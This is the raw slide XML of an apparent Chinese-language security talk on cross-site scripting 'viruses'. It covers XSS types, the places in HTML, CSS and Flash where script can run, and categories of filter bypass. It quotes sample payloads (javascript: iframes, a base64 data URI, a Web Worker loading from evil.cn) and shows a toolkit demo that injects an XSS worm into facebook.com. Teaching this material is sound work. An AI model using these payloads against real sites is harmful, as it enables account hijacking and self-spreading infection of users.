            <a:ext cx="1714512" cy="945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victim page</a:t>
            </a:r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3143240" y="3775636"/>
            <a:ext cx="2214578" cy="1055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760769" y="3118964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request</a:t>
            </a:r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643306" y="377404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C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>infect exp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85852" y="4929198"/>
            <a:ext cx="2112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/>
              <a:t>same domain</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" smtClean="0"/>
              <a:t>www.xiaonei.com</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="圆角矩形 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1113948" y="2643182"/>
            <a:ext cx="7143800" cy="3429024"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 904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/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="5441045" y="4577106"/>
            <a:ext cx="983246" cy="669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071934" y="4357694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C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>insert shellcode</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill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rot="5400000" flipH="1" flipV="1">
            <a:off x="5857884" y="4572008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440635" y="435769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load()</a:t>
            </a:r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571896" y="1702346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evil.cn/j.js</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="30" name="直接箭头连接符 29"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="3143240" y="3498849"/>
            <a:ext cx="221457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smtClean="0"/>
              <a:t>XSS Virus Tips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mtClean="0"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>html5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>的新特性</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>canvas: crack captcha</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>web worker: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>解决</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>xss virus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>的大数据量计算</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>html5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>虽然得到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>ff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>的全面支持，还不够</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>web worker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>后台开启的一个线程工作（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>new Worker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/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>后台运行的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Worker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>不能操作</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>DOM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>关键是数据处理，还可以用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>xhr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>进行网络操作，不过也是有限制的</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>缺陷：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>var worker = new Worker("http://evil.cn/f.js");</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>不能跨域加载</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>文件</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>…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92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>相关资源</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:srgbClr val="92D05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smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://ha.ckers.org/xss.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://code.google.com/p/browsersec/wiki/Main</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0">
              <a:hlinkClick r:id="rId4"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://en.wikipedia.org/wiki/Cross-site_scripting</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>http://www.webappsec.org/projects/articles/071105.shtml</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>http://xeye.us/lab/xssor/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0">
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>http://xeye.us/lab/xssee/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0">
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>http://www.businessinfo.co.uk/labs/hackvertor/hackvertor.php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0">
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>http://www.xssed.com/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0">
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t>http://www.w3.org/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0">
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0">
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t>developer.mozilla.org/en/data_URIs</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p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1538" y="3337560"/>
            <a:ext cx="6480048" cy="2301240"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>欢迎交流</a:t>
            </a:r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00100" y="1857364"/>
            <a:ext cx="47340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7CBF33"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;&gt;&gt; from xeyelibs import *</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7CBF33"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;&gt;&gt; x = xeye.xss('http://www.facebook.com')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7CBF33"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;&gt;&gt; x.login('lurenjia@gmail.com', '*******')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7CBF33"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;&gt;&gt; x.load(payloads['inject_xss_virus_f'])</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7CBF33"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;&gt;&gt; x.run()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7CBF33"/>
                </a:solidFill>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:srgbClr val="7CBF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92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>类型</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:srgbClr val="92D05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Reflected  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>跨站代码一般存在于链接中，请求这样的链接时，跨站代码经过服务端反射回来，这类跨站的代码一般不存储到服务端</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Stored </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>这是利用起来最方便的跨站类型，跨站代码存储于服务端（比如数据库中）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>DOM Based XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>一种基于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>DOM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>的跨站，这是客户端脚本自身解析不正确导致的安全问题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92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>哪里可以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:srgbClr val="92D05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mtClean="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>本身</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>元素、元素属性、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" err="1" smtClean="0"/>
              <a:t>CSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>等</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>文档</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Flash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>客户端软件</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" err="1" smtClean="0"/>
              <a:t>QQ2009</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>、灵格斯词典、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>office</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>rar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>自解压等</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>上的一些媒体元素</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" err="1" smtClean="0"/>
              <a:t>wmf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>, word, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" err="1" smtClean="0"/>
              <a:t>pdf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t> ,applet…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="420624" lvl="1" indent="-384048">
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3000" smtClean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92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Bypass XSS Filter</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:srgbClr val="92D05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50926" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>中有多处可以合法执行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>JS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="550926" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>中的其它媒体元素导致的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="550926" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>浏览器解析处理差异导致的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="550926" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>浏览器特性导致的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="550926" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>浏览器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>bug</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>导致的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="550926" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>编码问题导致的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="550926" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>不完备的黑名单策略导致的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="550926" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>XSS Filter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>本身的缺陷导致的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="550926" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>以上综合因素导致的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>XSS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smtClean="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" smtClean="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" smtClean="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" smtClean="0"/>
              <a:t>中有多处可以合法执行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" smtClean="0"/>
              <a:t>JS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smtClean="0"/>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>标签</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>伪协议</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>&lt;iframe src=j&amp;#13;avascript:alert(/xeye/)&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="420624" lvl="1" indent="-384048">
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3000" smtClean="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3000" smtClean="0"/>
              <a:t>属性</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3000" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>on*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>事件、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>style</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>属性、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>action/src/href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>等</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="420624" lvl="1" indent="-384048">
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3000" smtClean="0"/>
              <a:t>CSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3000" smtClean="0"/>
              <a:t>中</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3000" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>expression, javascript:, moz-binding</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>等</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="420624" lvl="1" indent="-384048">
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3000" smtClean="0"/>
              <a:t>Data URI XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>data:text/html;base64,PHNjcmlwdD5hbGVydCgveGV5ZS8pPC9zY3JpcHQ+DQo=</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>内容输出到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>中，包括</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>base64</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>解码后的脚本</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="420624" lvl="1" indent="-384048">
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3000" smtClean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smtClean="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" smtClean="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" smtClean="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" smtClean="0"/>
              <a:t>中的其它媒体元素导致的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" smtClean="0"/>
              <a:t>XSS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mtClean="0"/>
              <a:t>flash actionscript</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>getURL("javascript:alert(/xeye/)");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
